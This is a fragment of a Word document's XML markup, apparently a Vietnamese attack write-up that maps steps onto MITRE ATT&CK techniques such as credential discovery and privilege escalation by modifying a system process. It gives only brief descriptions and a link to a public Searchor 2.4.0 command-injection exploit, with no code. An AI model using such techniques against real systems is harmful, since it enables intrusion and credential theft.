              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Account </w:t>
            </w:r>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidR="00B93EEF" w:rsidRPr="00B93EEF">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="22"/>
                  <w:lang w:val="vi-VN"/>
                </w:rPr>
                <w:t>T1087</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B93EEF">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D5A4560" w14:textId="305D534D" w:rsidR="00BA42FD" w:rsidRPr="00D24E34" w:rsidRDefault="00BA42FD" w:rsidP="003266BE">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B93EEF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D24E34" w:rsidRPr="00B93EEF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Kẻ</w:t>
            </w:r>
            <w:r w:rsidR="00D24E34">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> tấn công thu thập những thông tin credentials có sẵn trên hệ thống từ các source code và dump thông tin từ service đang chạy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4137956E" w14:textId="3E9915F5" w:rsidR="00540FB3" w:rsidRPr="005A5EA7" w:rsidRDefault="00540FB3" w:rsidP="00540FB3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc152350963"/>
      <w:r w:rsidRPr="005A5EA7">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics: </w:t>
      </w:r>
      <w:r w:rsidR="0005295A" w:rsidRPr="0005295A">
        <w:rPr>
          <w:rStyle w:val="notion-enable-hover"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Privilege Escal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FB3" w:rsidRPr="00147C0B" w14:paraId="1B9E88C8" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C6C6FFC" w14:textId="77777777" w:rsidR="00540FB3" w:rsidRPr="00147C0B" w:rsidRDefault="00540FB3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Technique / Sub-Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3710D3EA" w14:textId="77777777" w:rsidR="00540FB3" w:rsidRPr="00147C0B" w:rsidRDefault="00540FB3" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00147C0B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Threat Actor Procedure(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00540FB3" w:rsidRPr="00147C0B" w14:paraId="1500B44E" w14:textId="77777777" w:rsidTr="003266BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BF23327" w14:textId="6BA35F8B" w:rsidR="00540FB3" w:rsidRPr="00BD400A" w:rsidRDefault="00223CEB" w:rsidP="003266BE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00223CEB">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Create or Modify System Process </w:t>
            </w:r>
            <w:r w:rsidR="00540FB3" w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidRPr="00223CEB">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b/>
                  <w:bCs/>
                </w:rPr>
                <w:t>T1543</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00540FB3" w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rStyle w:val="notion-enable-hover"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A1387D" w14:textId="0A667B73" w:rsidR="00540FB3" w:rsidRPr="00223CEB" w:rsidRDefault="00540FB3" w:rsidP="003266BE">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD400A">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Kẻ tấn công </w:t>
            </w:r>
            <w:r w:rsidR="00223CEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>sửa</w:t>
            </w:r>
            <w:r w:rsidR="00223CEB">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> lại file có sẵn để tận dụng thực thi code theo ý mình, chiếm quyền điều khiển cao hơn.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DAE6EDC" w14:textId="77777777" w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidRDefault="00147C0B" w:rsidP="00147C0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00147C0B" w:rsidRPr="00147C0B" w:rsidSect="0040477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CD3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C24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546C47"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="36CEEB3A"/>
    <w:lvl w:ilvl="0" w:tplc="918C2F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F1000"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="213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8F"/>
    <w:rsid w:val="00011093"/>
    <w:rsid w:val="0005243D"/>
    <w:rsid w:val="0005295A"/>
    <w:rsid w:val="000573C7"/>
    <w:rsid w:val="00066D50"/>
    <w:rsid w:val="0007453A"/>
    <w:rsid w:val="000D5854"/>
    <w:rsid w:val="000F0071"/>
    <w:rsid w:val="00147C0B"/>
    <w:rsid w:val="00192345"/>
    <w:rsid w:val="001D1232"/>
    <w:rsid w:val="00223CEB"/>
    <w:rsid w:val="002A573B"/>
    <w:rsid w:val="003A6411"/>
    <w:rsid w:val="003B352E"/>
    <w:rsid w:val="00404771"/>
    <w:rsid w:val="00484B7B"/>
    <w:rsid w:val="00540FB3"/>
    <w:rsid w:val="005854D2"/>
    <w:rsid w:val="005A5EA7"/>
    <w:rsid w:val="005A7F90"/>
    <w:rsid w:val="00617478"/>
    <w:rsid w:val="00624EB0"/>
    <w:rsid w:val="0063447B"/>
    <w:rsid w:val="00656825"/>
    <w:rsid w:val="00664DEE"/>
    <w:rsid w:val="006D6673"/>
    <w:rsid w:val="00733976"/>
    <w:rsid w:val="007D568C"/>
    <w:rsid w:val="00835C8F"/>
    <w:rsid w:val="008D4AF8"/>
    <w:rsid w:val="00944977"/>
    <w:rsid w:val="009E35E3"/>
    <w:rsid w:val="009E4898"/>
    <w:rsid w:val="00B3429F"/>
    <w:rsid w:val="00B809E1"/>
    <w:rsid w:val="00B93EEF"/>
    <w:rsid w:val="00BA42FD"/>
    <w:rsid w:val="00BD400A"/>
    <w:rsid w:val="00C10F6F"/>
    <w:rsid w:val="00C33B27"/>
    <w:rsid w:val="00C652A7"/>
    <w:rsid w:val="00D24E34"/>
    <w:rsid w:val="00D26A59"/>
    <w:rsid w:val="00D92435"/>
    <w:rsid w:val="00DC5CD7"/>
    <w:rsid w:val="00DE18FE"/>
    <w:rsid w:val="00E20AB8"/>
    <w:rsid w:val="00E860D5"/>
    <w:rsid w:val="00EE7A72"/>
    <w:rsid w:val="00EF22A1"/>
    <w:rsid w:val="00F136EF"/>
    <w:rsid w:val="00FB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E002"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CCD65741-D80F-4387-9FA9-CA9D693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5C8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5C8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5C8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C8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5C8F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C8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136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E18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F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5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58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854"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="notion-enable-hover">
    <w:name w:val="notion-enable-hover"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00147C0B"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001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-720375198">
    <w:name w:val="link-annotation-unknown-block-id--720375198"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00147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n0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.docker.com/config/formatting/?source=post_page-----964fed1515a6--------------------------------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nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injec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attack.mitre.org/techniques/T154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attack.mitre.org/techniques/T108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ttack.mitre.org/techniques/T1595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3E47-3D16-44E7-887B-54F764E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YUNG SHENG</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>KUO YUNG SHENG</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <cp:lastPrinted>2023-12-01T12:25:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-01T08:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T12:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>